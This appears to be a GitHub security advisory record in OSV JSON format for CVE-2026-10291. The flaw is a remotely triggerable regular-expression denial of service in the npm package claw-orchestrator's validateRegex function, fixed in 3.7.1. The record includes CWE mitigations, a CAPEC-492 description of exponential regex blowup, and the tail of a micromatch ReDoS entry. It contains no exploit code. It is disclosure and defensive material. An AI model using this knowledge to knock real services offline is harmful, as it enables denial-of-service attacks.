],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Regular Expression Denial of Service (ReDoS) in micromatch"
}
GHSA-95F6-RFPG-C3W8
Vulnerability from github – Published: 2026-06-02 00:31 – Updated: 2026-07-09 13:43A security vulnerability has been detected in Enderfga claw-orchestrator up to 3.7.0. The impacted element is the function validateRegex of the file claw-orchestrator/src/embedded-server.ts of the component Session Grep Endpoint. The manipulation of the argument body.pattern leads to inefficient regular expression complexity. The attack may be initiated remotely. Upgrading to version 3.7.1 is sufficient to resolve this issue. The identifier of the patch is 3f970a974c65a94555c25af9f2796f11315e4584. It is recommended to upgrade the affected component.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@enderfga/claw-orchestrator"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-10291"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-09T13:43:46Z",
"nvd_published_at": "2026-06-01T22:16:24Z",
"severity": "MODERATE"
},
"details": "A security vulnerability has been detected in Enderfga claw-orchestrator up to 3.7.0. The impacted element is the function validateRegex of the file claw-orchestrator/src/embedded-server.ts of the component Session Grep Endpoint. The manipulation of the argument body.pattern leads to inefficient regular expression complexity. The attack may be initiated remotely. Upgrading to version 3.7.1 is sufficient to resolve this issue. The identifier of the patch is 3f970a974c65a94555c25af9f2796f11315e4584. It is recommended to upgrade the affected component.",
"id": "GHSA-95f6-rfpg-c3w8",
"modified": "2026-07-09T13:43:46Z",
"published": "2026-06-02T00:31:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10291"
},
{
"type": "WEB",
"url": "https://github.com/Enderfga/claw-orchestrator/issues/64"
},
{
"type": "WEB",
"url": "https://github.com/Enderfga/claw-orchestrator/issues/64#issuecomment-4421942196"
},
{
"type": "WEB",
"url": "https://github.com/Enderfga/claw-orchestrator/commit/3f970a974c65a94555c25af9f2796f11315e4584"
},
{
"type": "PACKAGE",
"url": "https://github.com/Enderfga/claw-orchestrator"
},
{
"type": "WEB",
"url": "https://github.com/Enderfga/claw-orchestrator/releases/tag/v3.7.1"
},
{
"type": "WEB",
"url": "https://vuldb.com/cve/CVE-2026-10291"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/826222"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/367584"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/367584/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Claw Orchestrator has inefficient regular expression complexity via validateRegex()"
}
Mitigation
Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.
Mitigation
Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process.
Mitigation
Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.
Mitigation
Limit the length of the input that the regular expression will process.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.